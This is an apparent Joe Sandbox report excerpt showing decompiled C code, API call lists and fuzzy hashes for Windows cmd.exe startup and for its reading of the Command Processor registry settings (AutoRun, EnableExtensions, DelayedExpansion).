Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 37da115f7f131886ead916944f7ea2fa1529f37f192ff23bf91b7e5bdb3b2457
Instruction ID: 1b6113a5f25a7575f775de6f175a395e0e3b71872f90b8a1173a46e6dd9e7265
Opcode Fuzzy Hash: 37da115f7f131886ead916944f7ea2fa1529f37f192ff23bf91b7e5bdb3b2457
Instruction Fuzzy Hash: 93F02030A05128AB8B10AF75AD02B7E3BACABB5700B51014AF816C7A40CF34AD4597D0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7310 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 001C7315

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2fc2c4856e54362e08270d3974c9d1aa3ba776d6f699be66d0bdc99c16ed1c21
Instruction ID: 479906c4acb5071756cce0ade0c4432d718322fe75477506ab15aca8f1630ff8
Opcode Fuzzy Hash: 2fc2c4856e54362e08270d3974c9d1aa3ba776d6f699be66d0bdc99c16ed1c21
Instruction Fuzzy Hash: 4D90026035551096DB1077B15C09A15A5A45BA97027414454B001C9494DFA081489921

Uniqueness

Uniqueness Score: -1.00%

Function 001C3D27 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E001C3D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x1e3858 = 0x1e385c;
				InitializeCriticalSection(0x1e385c);
				EnterCriticalSection( *0x1e3858);
				_t131 = 0;
				 *0x1dd544 = 0;
				LeaveCriticalSection( *0x1e3858);
				_t29 = SetConsoleCtrlHandler(E001D6D90, 1);
				__imp___get_osfhandle(0x1e387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x1e3878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E001C06C0(_t98);
				 *0x1e3834 = E001C3AAE();
				 *0x1e3830 = E001C3B2C(_t98);
				E001C41DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E001BC5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E001C4B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E001BC5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E001C4B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E001C2A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E001C1040(_t134, 0x2000, GetCommandLineW());
				if(E001C0C70(0x1f3ab0, ((0 |  *0x1f3cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E001BC5A2(0x1f3ab0);
					_t103 = 0x2374;
					do {
						__eflags = E001C4B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x1f3cb8;
				if( *0x1f3cb8 == 0) {
					_t108 = 0x1f3ab0;
				}
				E001C36CB(_t95, _t108,  *0x1f3cc0, _t131);
				E001BCEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E001BD3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x1f3cb8;
				_t130 = 0x1f3ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x1f3ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x1f8528;
						if( *0x1f8528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E001BC5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x1f3cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x1f3ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x1f3cc0);
						if(__eflags == 0) {
							do {
								__eflags = E001C4B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x1f3cb8;
							__eflags =  *0x1f3cb8;
							if(__eflags == 0) {
								_t124 = 0x1f3ab0;
							}
							_t130 = 0;
							E001C33FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x1e3854 = _t60;
					GetCPInfo(_t60, 0x1e3840);
					E001C3F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x1e3874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x1e3874;
						 *( *0x1e3874) = 0;
					}
					if( *0x1f3ccc == _t131) {
						__eflags = E001C269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x1dd5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x1dd5a0; // 0x0
							E001D7DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x1dd5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x1dd5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E001D6456(__eflags);
							E001B443C( &_v72);
							E001BC108( &_v72, 0x2350, 1,  &_v72);
							E001C25D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E001BC5A2( &_v72);
							} else {
								_push(_t72);
								E001C25D9(L"%s");
								E001C25D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x1dd0d0 = _t76;
						 *0x1e388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x1dd0d0, "IsDebuggerPresent");
						 *0x1e3888 = GetProcAddress( *0x1dd0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E001C6FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}

0x001c3d27
0x001c3d2f
0x001c3d36
0x001c3d3f
0x001c3d43
0x001c3d46
0x001c3d4b
0x001c3d57
0x001c3d63
0x001c3d65
0x001c3d6b
0x001c3d78
0x001c3d85
0x001c3d8d
0x001c3d99
0x001c3d9f
0x001c3da1
0x001c3da7
0x001c3db1
0x001c3dbd
0x001c3dc2
0x001c3dc7
0x001c3dcd
0x001c3dcd
0x001c3dd0
0x001c3dd0
0x001c3dd3
0x001c3dd6
0x001c3de5
0x001c3de7
0x001ce043
0x001ce049
0x001ce04f
0x001ce050
0x001ce056
0x001ce056
0x001ce05a
0x001ce05c
0x001ce062
0x001ce062
0x001ce068
0x001ce06e
0x001ce06f
0x001ce075
0x001ce075
0x00000000
0x001ce079
0x001c3def
0x001c3df2
0x001c3df7
0x001c3dfc
0x00000000
0x00000000
0x001c3e10
0x001c3e38
0x001ce07b
0x001ce081
0x001ce087
0x001ce088
0x001ce08e
0x001ce08e
0x00000000
0x001ce092
0x001c3e3e
0x001c3e46
0x001ce094
0x001ce094
0x001c3e53
0x001c3e58
0x001c3e5d
0x001c3e5f
0x001c3e62
0x001c3e62
0x001c3e65
0x001c3e68
0x001c3e68
0x001c3e76
0x001c3e7b
0x001c3e80
0x001c3e85
0x001c3e89
0x001ce09e
0x001ce09e
0x001c3e91
0x001c3e95
0x001c3e98
0x001ce0a5
0x001ce0a7
0x001ce0a9
0x001ce0ab
0x001ce0ab
0x001ce0af
0x001ce0b0
0x001ce0b4
0x001ce0b7
0x00000000
0x001ce0bd
0x001ce0bd
0x001ce0c4
0x00000000
0x00000000
0x001ce0ca
0x001ce0cc
0x001ce0ce
0x001ce0ce
0x001ce0d8
0x001ce0dd
0x001ce0e2
0x001ce0e5
0x001ce0e7
0x001ce0e9
0x001ce0e9
0x001ce0fb
0x001ce0fd
0x001ce11a
0x001ce120
0x001ce120
0x00000000
0x001ce0ff
0x001ce0ff
0x001ce105
0x001ce107
0x001ce109
0x001ce109
0x001ce10e
0x001ce110
0x00000000
0x001ce110
0x001ce0fd
0x001c3e9e
0x001c3e9e
0x001c3e9e
0x001c3eaa
0x001c3eaf
0x001c3eb5
0x001c3ec7
0x001c3ecd
0x001c3ed4
0x001ce129
0x001ce130
0x001ce130
0x001c3ef0
0x001ce140
0x001ce142
0x00000000
0x00000000
0x001ce148
0x001ce14f
0x001ce183
0x001ce183
0x001ce189
0x00000000
0x001ce189
0x001ce15e
0x001ce164
0x001ce166
0x001ce174
0x001ce168
0x001ce168
0x001ce16c
0x001ce16c
0x001ce17a
0x001ce17d
0x00000000
0x00000000
0x00000000
0x00000000
0x001c3ef6
0x001c3ef6
0x001c3efc
0x001ce19b
0x001ce19e
0x001ce1ae
0x001ce1b8
0x001ce1bd
0x001ce1c3
0x001ce1c5
0x001ce1e1
0x001ce1e2
0x001ce1e4
0x001ce1c7
0x001ce1c7
0x001ce1cd
0x001ce1d7
0x001ce1dc
0x001ce1ef
0x001ce1ef
0x001c3f07
0x001c3f13
0x001c3f29
0x001c3f2e
0x001c3f45
0x001c3f4a
0x001c3f4f
0x001c3f5d
0x001c3f5d
0x001c3f5f
0x001c3f77
0x001c3f77
0x001c3ef0

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001E385C), ref: 001C3D4B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001C3D57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001C3D6B
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001D6D90,00000001), ref: 001C3D78
_get_osfhandle.MSVCRT ref: 001C3D85
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C3D8D
_get_osfhandle.MSVCRT ref: 001C3D99
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C3DA1

Part of subcall function 001C06C0: _get_osfhandle.MSVCRT ref: 001C06D8
Part of subcall function 001C06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001D38A5), ref: 001C06E2
Part of subcall function 001C06C0: _get_osfhandle.MSVCRT ref: 001C06EF
Part of subcall function 001C06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C06F9
Part of subcall function 001C06C0: _get_osfhandle.MSVCRT ref: 001C071E
Part of subcall function 001C06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C0728
Part of subcall function 001C06C0: _get_osfhandle.MSVCRT ref: 001C0750
Part of subcall function 001C06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C075A

Part of subcall function 001C3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,001C3A9F), ref: 001C3AB2
Part of subcall function 001C3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 001C3ACD
Part of subcall function 001C3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C3AD4
Part of subcall function 001C3AAE: memcpy.MSVCRT ref: 001C3AE3
Part of subcall function 001C3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 001C3AEC

Part of subcall function 001C3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,001C3DBB), ref: 001C3B33
Part of subcall function 001C3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001C3DBB), ref: 001C3B3A

Part of subcall function 001C41DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001C423D
Part of subcall function 001C41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 001C427D
Part of subcall function 001C41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 001C42B7
Part of subcall function 001C41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 001C4307
Part of subcall function 001C41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 001C4341

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001C3DC7
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001C3E02
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 001C3E9E
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001C3EAF
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 001C3EC0
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C3EC7
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 001C3EDC
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 001C3F07
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 001C3F18
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 001C3F2E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 001C3F3F
??_V@YAXPAX@Z.MSVCRT ref: 001C3F5F

Strings

KERNEL32.DLL, xrefs: 001C3F02
SetConsoleInputExeNameW, xrefs: 001C3F34
IsDebuggerPresent, xrefs: 001C3F1E
CopyFileExW, xrefs: 001C3F0D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 570592814-3021193919
Opcode ID: 0dd1fb35f98d170955ee9d1957801e8d1831a4e13c58958e68a2ff36ddc642cf
Instruction ID: 2c3ef651425127c2082af2373a5e845586b6ac51a4e9220e36ba14067488aee1
Opcode Fuzzy Hash: 0dd1fb35f98d170955ee9d1957801e8d1831a4e13c58958e68a2ff36ddc642cf
Instruction Fuzzy Hash: 3EA1D471600340ABDB18BBA5AC4AFBE37B9EBA4700B04412EF516DB5A1DF70DE91C751

Uniqueness

Uniqueness Score: -1.00%

Function 001C41DD Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311
registryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001C41DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E001C8290(0x101c);
				_t85 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0x1f3cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0x1f8528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0x1f8528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0x1f3cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0x1f3cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0x1f3cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0x1f3cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0x1dd0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0x1dd0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0x1dd0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E001C1040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E001BDF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0x1dd0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0x1dd0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0x1dd0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0x1dd0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0x1dd0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0x1dd0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0x1dd0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0x1dd5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E001C6FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}

0x001c41e7
0x001c41ec
0x001c41f3
0x001c41fb
0x001c41fd
0x001c420d
0x001c4217
0x001c4218
0x001c421f
0x001c4221
0x001c4227
0x001c423d
0x001c4245
0x00000000
0x00000000
0x001c424b
0x001c425e
0x001c4285
0x001ce517
0x001ce533
0x001ce539
0x001ce540
0x001ce54a
0x001ce54e
0x001ce54e
0x001ce519
0x001ce520
0x001ce520
0x001ce517
0x001c4291
0x001c42b7
0x001c42bf
0x001c42c8
0x001ce55f
0x001ce565
0x001ce56c
0x001ce576
0x001ce57a
0x001ce57a
0x001c42ce
0x001c42d4
0x001c42d4
0x001c42c8
0x001c42e1
0x001c430f
0x001ce58b
0x001ce5a7
0x001ce5ad
0x001ce5b4
0x001ce5be
0x001ce5c2
0x001ce5c2
0x001ce58d
0x001ce594
0x001ce594
0x001ce58b
0x001c431b
0x001c4349
0x001c4365
0x001c436b
0x001c4399
0x001c43d5
0x001c43db
0x001c4409
0x001ce65c
0x001ce664
0x001c444a
0x001c444a
0x001c4454
0x001c4463
0x001c4463
0x001c44f0
0x001c44f0
0x001c446e
0x001c4474
0x001c44a2
0x001ce67c
0x001ce68a
0x001ce69a
0x001ce6a7
0x001ce6be
0x001ce6a9
0x001ce6b5
0x001ce6b5
0x001ce6c5
0x001ce6c5
0x001ce6d3
0x001ce6e4
0x001ce6e4
0x001ce6d3
0x001c44ae
0x00000000
0x001c44ae
0x001c445a
0x001c445d
0x001ce66a
0x00000000
0x001ce66a
0x00000000
0x001c445d
0x001c4416
0x001ce62e
0x001ce649
0x00000000
0x001ce649
0x001ce63b
0x001ce641
0x00000000
0x001c441c
0x001c441c
0x001c4423
0x001c4423
0x001c4429
0x001c442c
0x001ce656
0x001c4442
0x001c4442
0x001c4444
0x00000000
0x001c4444
0x001c4434
0x001c4437
0x001c443b
0x00000000
0x00000000
0x00000000
0x00000000
0x001c443b
0x001c4416
0x001c43a2
0x001ce5f9
0x001ce614
0x00000000
0x001ce614
0x001ce606
0x001ce60c
0x00000000
0x001c43a8
0x001c43a8
0x001c43af
0x001c43af
0x001c43b5
0x001c43b8
0x001ce621
0x001c43ce
0x001c43ce
0x00000000
0x001c43ce
0x001c43c0
0x001c43c6
0x001c43c7
0x00000000
0x00000000
0x00000000
0x00000000
0x001c43c7
0x001c434b
0x001c4352
0x001ce5d3
0x00000000
0x00000000
0x001ce5e4
0x001ce5ea
0x00000000
0x001c4358
0x001c4358
0x001c435f
0x001c435f
0x00000000
0x001c435f
0x001c4352
0x001c44b4
0x001c44b4
0x001c44b7
0x001c44ba
0x001c44c0
0x001c44c8
0x001c44cf
0x001c44e7
0x001c44e7
0x001c44c0

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 001C423D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 001C427D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 001C42B7
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 001C4307
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 001C4341
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 001C4391
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 001C4401
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 001C449A
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001C44AE
time.MSVCRT ref: 001C44C8
srand.MSVCRT ref: 001C44CF

Strings

AutoRun, xrefs: 001C448F
DisableUNCCheck, xrefs: 001C4272
PathCompletionChar, xrefs: 001C43F6
CompletionChar, xrefs: 001C4386
DelayedExpansion, xrefs: 001C42FC
Software\Microsoft\Command Processor, xrefs: 001C4235
DefaultColor, xrefs: 001C4336
EnableExtensions, xrefs: 001C42AC

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 0a1d88f787e80a3d544d3d4cc39370709adae82dfdefbe74402784d27c1e20c2
Instruction ID: c27b97f98c5aae2a683a55c7102f7056420ae0312f865786e4fb29a9ec18fa49
Opcode Fuzzy Hash: 0a1d88f787e80a3d544d3d4cc39370709adae82dfdefbe74402784d27c1e20c2
Instruction Fuzzy Hash: 77C180359042A8EBDF329B10DD05FE977B8FB28706F1040DAE689A2590D7B09EC8CF55

Uniqueness

Uniqueness Score: -1.00%

Function 001D65A0 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

